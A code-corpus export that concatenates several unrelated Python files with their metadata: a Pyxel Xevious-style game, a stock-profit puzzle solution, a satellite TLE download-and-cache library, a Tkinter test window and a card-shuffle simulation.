        #pyxel.blt(self.x, self.y, 0, 8, 32, 8, 8 , 15)
        # vsync % 10 is truthy on 9 of every 10 frames, so the first sprite
        # shows most of the time and the alternate flashes once per 10 frames.
        if vsync % 10:
            pyxel.blt(self.x, self.y, 0, 0, 32, define.BULLET_WIDTH, define.BULLET_HEIGHT, define.MASK_COLOR)
        else:
            pyxel.blt(self.x, self.y, 0, 8, 32, define.BULLET_WIDTH, define.BULLET_HEIGHT, define.MASK_COLOR)
#------------------------------------------------------------------------------
def _Update_Title(self):
    """Title-screen input: pressing [1] starts a fresh play session."""
    # Game start
    if pyxel.btn(pyxel.KEY_1):
        self.GameState = define.STATE_PLAY
        self.Map_y = (255 - 32)  # tilemap scroll origin (bottom of the map)
        self.y_offset = 8        # sub-tile scroll offset in pixels
        self.px = 128 - 8        # player ship coordinates
        self.py = 200
        self.vsync = 0
#------------------------------------------------------------------------------
def _Draw_Title(self):
    """Draw the title screen: logo image plus the centered start prompt."""
    # Clear the screen.
    pyxel.cls(0)
    # Title logo from image bank 1.
    pyxel.blt(58, 50, 1, 0, 208, 140, 47, define.MASK_COLOR)
    #txt = "Smell Like Tiny XEVIOUS"
    #txtlen = len(txt) * 4
    #pyxel.text(128 - (txtlen /2), 50, txt, 7)
    # Each glyph is 4 px wide, so txtlen/2 centers the prompt at x=128.
    txt = "Press [1] to Start Game!"
    txtlen = len(txt) * 4
    pyxel.text(128 - (txtlen /2), 128, txt, 7)
    #pyxel.text(123, 60, txt, 14)
    #pyxel.blt(124, 64,  # screen origin
    #          1,        # tilemap page number
    #          0, 208,   # tilemap origin
    #          128, 46)  # blit size
#------------------------------------------------------------------------------
def _Update_Play(self):
    """Per-frame gameplay logic: input, zapper fire, spawning, object updates."""
    # Advance the frame counter, wrapping at 60 (matches fps=60).
    if 59 <= self.vsync:
        self.vsync = 0
    else:
        self.vsync += 1
    # Key input & movement: the ship and the tilemap scroll offset move together.
    if pyxel.btn(pyxel.KEY_LEFT):
        self.px -= define.PLAYER_SPEED
        self.map_offx -= 1
    if pyxel.btn(pyxel.KEY_RIGHT):
        self.px += define.PLAYER_SPEED
        self.map_offx += 1
    if pyxel.btn(pyxel.KEY_UP):
        self.py -=define.PLAYER_SPEED
        self.map_offy -= 1
    if pyxel.btn(pyxel.KEY_DOWN):
        self.py += define.PLAYER_SPEED
        self.map_offy += 1
    # Zapper fire: btnp with hold/repeat so holding X autofires; two bullets side by side.
    if pyxel.btnp(pyxel.KEY_X, 10, 20):
        Bullet(self.px, self.py)
        Bullet(self.px + 10, self.py)
    # Publish the player position to the enemies' shared class attributes.
    enemy.Enemy.player_x = self.px
    enemy.Enemy.player_y = self.py
    # Debug: spawn a dummy enemy with the A key.
    if pyxel.btnp(pyxel.KEY_A, 10, 30):
        enemy_list.append(enemy.Enemy_Toroid(50, 0, 16, 16))
    # Debug: toggle background scrolling with the 8/9 keys.
    if pyxel.btnp(pyxel.KEY_8, 10, 30):
        self.scroll = True
    if pyxel.btnp(pyxel.KEY_9, 10, 30):
        self.scroll = False
    # Update player bullets, then drop the dead ones.
    update_list(bullet_list)
    flash_list(bullet_list)
    # Update enemies, then drop the dead ones.
    update_list(enemy_list)
    flash_list(enemy_list)
#------------------------------------------------------------------------------
def _Draw_Play(self):
    """Per-frame rendering: background tilemap, palette blink test, sprites, HUD."""
    # Clear the screen.
    pyxel.cls(0)
    # Background tilemap (full-view debug display).
    pyxel.bltm(0,0, # screen origin
        0, # tilemap page number
        self.map_offx, self.map_offy , # tilemap origin
        32,32) # blit size in tiles
    # (Disabled) tilemap scroll experiment:
    # pyxel.bltm(0,self.y_offset * -1,  # screen origin
    #            0,                     # tilemap page number
    #            0, self.Map_y ,        # tilemap origin
    #            32,33)                 # blit size
    # self.map_offx = 0
    # self.map_offy = 1
    # Scroll the background by half a pixel per frame; after a full tile (8 px),
    # reset the offset and move the map origin up one row.
    if self.scroll == True:
        self.y_offset -= 0.5
        if self.y_offset == 0:
            self.y_offset = 8
            self.Map_y -= 1
    # Red-core palette blink test: every 20 frames, step palette color 11
    # through shades 12..14 and back. NOTE(review): the nesting of this elif
    # chain under the vsync check was reconstructed from a whitespace-stripped
    # source — confirm against the original file.
    if self.vsync % 20 == 0:
        self.colcnt += 1
        if self.colcnt == 0:
            pyxel.pal()
        elif self.colcnt == 1:
            pyxel.pal(11, 12)
        elif self.colcnt == 2:
            pyxel.pal(11, 13)
        elif self.colcnt == 3:
            pyxel.pal(11, 14)
        elif self.colcnt == 4:
            pyxel.pal(11, 14)
        elif self.colcnt == 5:
            pyxel.pal(11, 13)
        elif self.colcnt == 6:
            pyxel.pal(11, 12)
        elif self.colcnt == 7:
            #pyxel.pal()
            self.colcnt = 0
    # Player ship (Solvalou).
    pyxel.blt(self.px, self.py, 0, 0, 0, define.PLAYER_WIDTH, define.PLAYER_HEIGHT, define.MASK_COLOR)
    # Aiming reticle, 64 px ahead of the ship.
    pyxel.blt(self.px, self.py - 64, 0, 16, 0, 16, 16, define.MASK_COLOR)
    # Draw player bullets.
    #if self.vsync % 3 == 0:
    draw_list(bullet_list, self.vsync)
    # Draw enemies.
    draw_list(enemy_list, self.vsync)
    # Debug HUD: player coordinates.
    temp = "PX= " + str(self.px) + ": PY=" + str(self.py)
    pyxel.text(0, 0, temp, 7)
#------------------------------------------------------------------------------
# Game main loop
class GameMain:
    """Owns pyxel initialization and dispatches update/draw by game state."""
    def __init__(self):
        # Initialization: window, palette (slots 11-14 are the red shades used
        # by the blink test; 15 is the transparency/mask color), assets.
        pyxel.init(define.WINDOW_WIDTH, define.WINDOW_HEIGHT, caption="Smell Like Tiny Mevious",
            #         0(black)  1(green)  2(green)  3(green)  4(yellow) 5(blue)   6(gray)   7(white)  8(unused) 9         10        11(red1)  12(red2)  13(red3)  14(red4)  15(transparent)
            palette=[0x000000, 0x8CC323, 0x69B923, 0x007846, 0xF0EB3C, 0x194696, 0x7D7D7D, 0xFFFFFF, 0xFFFFFF, 0x824141, 0xC8AA32, 0xff1414, 0xC81414, 0x961414, 0x641414, 0xC896B4],
            fps = 60, quit_key=pyxel.KEY_Q)
        #pyxel.init(255, 255, caption="Xevious", fps=60, quit_key=pyxel.KEY_Q)
        pyxel.load("./assets/mevious.pyxres")
        pyxel.image(0).load(0, 0, "./assets/mevious_01.png")
        pyxel.image(1).load(0, 0, "./assets/mevious_bg.png")
        self.GameState = define.STATE_TITLE
        # Debug/rendering state.
        self.colcnt = 0      # palette blink counter
        self.scroll = True   # background scrolling enabled
        self.map_offx = 0    # tilemap scroll offsets
        self.map_offy = 0
        # Blocks until the window closes.
        pyxel.run(self.update, self.draw)
    def update(self):
        """Dispatch the per-frame logic for the current game state."""
        if self.GameState == define.STATE_PLAY:
            _Update_Play(self)
        elif self.GameState == define.STATE_TITLE:
            _Update_Title(self)
    def draw(self):
        """Dispatch the per-frame rendering for the current game state."""
        if self.GameState == define.STATE_PLAY:
            _Draw_Play(self)
        elif self.GameState == define.STATE_TITLE:
            _Draw_Title(self)
GameMain()
| true |
c052d1bdbab67f90d16cada85d8e90cfd74b84b9 | Python | Neminem1203/Puzzles | /DailyCodingProblem/47-hindsightStockTrade.py | UTF-8 | 723 | 4.5 | 4 | [] | no_license | '''
Given a array of numbers representing the stock prices of a company in chronological order, write a function that calculates the maximum profit you could have made from buying and selling that stock once. You must buy before you can sell it.
For example, given [9, 11, 8, 5, 7, 10], you should return 5, since you could buy the stock at 5 dollars and sell it at 10 dollars.
'''
def stocktrade(company):
    """Maximum single buy-then-sell profit over chronological prices.

    Tracks the lowest price seen so far and the best gain achievable by
    selling at each later price. Returns 0 when no profitable trade exists.

    Robustness fix: an empty price list now returns 0 instead of raising
    IndexError on company[0].
    """
    if not company:
        return 0
    current_low = company[0]
    profit = 0
    for price in company:
        # Evaluate selling at `price` before (possibly) lowering the buy point,
        # preserving the original buy-before-sell ordering.
        gain = price - current_low
        if gain > profit:
            profit = gain
        if price < current_low:
            current_low = price
    return profit
# Expected output: 5 (buy at 5, sell at 10) and 11 (buy at 9, sell at 20).
print(stocktrade([9, 11, 8, 5, 7, 10]))
print(stocktrade([9, 20, 1, 5, 7, 11]))
4cdba18dc592e82cd400e9ef1b5ed8b5324babad | Python | jeremymturner/pytle | /pytle/__init__.py | UTF-8 | 4,530 | 2.625 | 3 | [
"Apache-2.0"
] | permissive | import ephem
import os
from os.path import join, dirname, abspath, isfile
from datetime import datetime, timedelta
import logging
import json
from jinja2 import Template
try:
from urllib.request import urlopen, Request
except ImportError:
from urllib import urlencode
from urllib2 import urlopen, Request, HTTPError
name = "pytle"  # package name used when deriving the cache directory (~/.pytle)
# NOTE(review): configuring the root logger at library import time is a side
# effect on the importing application — confirm it's intended.
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
def get_path(filename):
    """Absolute path to *filename* inside this package's data/ directory."""
    data_dir = join(dirname(abspath(__file__)), 'data')
    return join(data_dir, filename)
class pytle:
    """Downloads, caches, and parses TLE ("keps") element sets.

    Satellites are keyed by name (spaces replaced by underscores); each entry
    holds optional per-satellite metadata from data/sats/<name>.json plus the
    parsed pyephem body under the "ephem" key.
    """
    def __init__(self, keps_url='', cache=False):
        # With no URL the object is constructed empty; note that self.satlist
        # is then never assigned, so the getters would raise AttributeError.
        if keps_url:
            if cache:
                # Cache lives in ~/.pytle (derived from the class name).
                cache_dir = os.environ.get('HOME') + '/.' + type(self).__name__
                keps = self.try_cache(keps_url, cache_dir)
            else:
                keps = self.download_keps(keps_url)
            self.satlist = self.load_keps(keps)
    def get_sat_info(self, name):
        """Return the metadata dict for `name` (empty dict if unknown),
        with the non-serializable "ephem" entry removed."""
        item = self.satlist.get(name, {})
        # NOTE(review): `item` is the stored dict itself, so pop() permanently
        # removes "ephem" from satlist on first call — confirm intended.
        if "ephem" in item:
            item.pop("ephem")
        return item
    def get_sat_info_text(self, name):
        """Render the satellite's info through the bundled Jinja2 template."""
        with open(get_path('templates/sat_info.j2')) as sat_info:
            template = Template(sat_info.read())
        return template.render(self.get_sat_info(name))
    def download_keps(self, keps_url):
        """Fetch the raw TLE file and return it as a list of text lines.

        Side effect: keeps the raw bytes on self.data for cache_keps().
        NOTE(review): on TimeoutError this calls exit(), terminating the host
        process — a library should raise instead; confirm before changing.
        """
        logging.debug("Downloading keps from " + keps_url)
        try:
            with urlopen(keps_url) as response:
                self.data = data = response.read()
                kep_lines = data.decode().split('\n')
        except TimeoutError:
            logging.error("Timeout in accessing " + keps_url)
            exit()
        return kep_lines
    def cache_keps(self, cache_file):
        """Write the last-downloaded raw bytes (self.data) to cache_file."""
        logging.debug("Writing keps cache to " + cache_file)
        with open(cache_file, 'wb') as out_file:
            out_file.write(self.data)
    def load_keps(self, keps):
        """Parse 3-line TLE groups into {name: {metadata..., "ephem": body}}."""
        satlist = {}
        kepslist = []
        # Every 3rd line starting at 0 is a satellite name; normalize spaces.
        self.names = names = [line.translate(str.maketrans(' ', '_')) for i, line in enumerate(keps) if i % 3 == 0]
        for i, line in enumerate(keps):
            # i % 3 == 2 is the second element line; the group is keps[i-2..i].
            if i % 3 == 2:
                name = keps[i - 2].strip().translate(str.maketrans(' ', '_'))
                eph = ephem.readtle(
                    keps[i - 2],
                    keps[i - 1],
                    keps[i])
                logging.debug("TLE " + name)
                satlist[name] = {}
                # Load satellite specific defaults (band, frequencies, mode)
                if isfile(get_path("sats/" + name + ".json")):
                    with open(get_path("sats/" + name + ".json")) as file:
                        satinfo = json.loads(file.read())
                        logging.debug("SAT " + name)
                        for key, value in satinfo[name].items():
                            try:
                                # Python 2: coerce unicode keys/values to utf-8 str.
                                key = key.encode('utf-8') if isinstance(key, unicode) else key
                                value = value.encode('utf-8') if isinstance(value, unicode) else value
                            except NameError:
                                # Python 3: `unicode` is undefined; nothing to do.
                                pass
                            satlist[name][key] = value
                satlist[name]["ephem"] = eph
        logging.debug("Loaded %s satellites" % len(names))
        return satlist
    def try_cache(self, keps_url, cache_dir):
        """Return kep lines from a <=7-day-old cache, else download and refresh it."""
        cache_file = cache_dir + '/keps.txt'
        cache_days = 7
        cache_file_ts = None
        keps = None
        # If the cache dir does not exist, create it.
        if not os.path.isdir(cache_dir):
            os.mkdir(cache_dir)
        # If the cache file does not exist, download and write it.
        if not os.path.isfile(cache_file):
            keps = self.download_keps(keps_url)
            self.cache_keps(cache_file=cache_file)
        # The cache file exists: check its age.
        else:
            weekago = datetime.now() - timedelta(days=cache_days)
            # NOTE(review): getctime is platform-dependent (metadata-change time
            # on Unix) — getmtime would track the write more reliably.
            cache_file_ts = datetime.fromtimestamp(os.path.getctime(
                cache_file))
            # Cache is fresh enough: use it.
            if cache_file_ts > weekago:
                logging.debug("Using cached keps from " + cache_file)
                with open(cache_file) as file:
                    return file.read().split('\n')
            else:
                keps = self.download_keps(keps_url)
                self.cache_keps(cache_file=cache_file)
        return keps
| true |
8e23e2a4ccef6e6d1a41632fdd5161481fa7bcc9 | Python | zhangchen6523/test | /videoCapture/test.py | UTF-8 | 371 | 2.734375 | 3 | [] | no_license | from tkinter import *
# Minimal fixed-size Tkinter window used as a GUI smoke test.
fontSize = 12
root = Tk()
root.title("测试程序")
root.geometry("1200x500")
root.resizable(width=False, height=False)
status_label = Label(root, text="测试开始", bg="black", font=("Arial", fontSize), width=8, height=3)
status_label.pack(side=TOP)
action_button = Button(root, text="点击处理", font=("Arial", fontSize), width=8, height=3)
action_button.pack(side=LEFT)
root.mainloop()
8b1473ab767238588611ba69101255152db1aa76 | Python | Nano-UT/appli_stat_report | /1st_report/card_stat.py | UTF-8 | 610 | 3.375 | 3 | [] | no_license | from random import shuffle
def trial():
    """Deal 5-card hands from a shuffled rank-only deck (13 ranks x 4).

    Returns the 1-based index of the first hand containing a repeated rank,
    or 20 once fewer than 5 cards remain.
    """
    deck = [card // 4 for card in range(52)]
    shuffle(deck)
    hand_number = 1
    while True:
        if len(deck) < 5:
            return 20
        hand = deck[:5]
        if len(hand) != len(set(hand)):
            # Duplicate rank found in this hand.
            return hand_number
        hand_number += 1
        deck = deck[5:]
# Monte-Carlo estimate of the expected trial() outcome, with its standard error.
data = [trial() for _ in range(40000)]
ave = sum(data) / len(data)
# Idiom fix: iterate the values directly instead of indexing via range(len(...)).
dev_square = [(d - ave) ** 2 for d in data]
unbiased_var = sum(dev_square) / (len(data) - 1)
std_err = (unbiased_var / len(data)) ** (1/2)
print("期待値の推定値: " + str(ave))
print("推定誤差: " + str(std_err))
| true |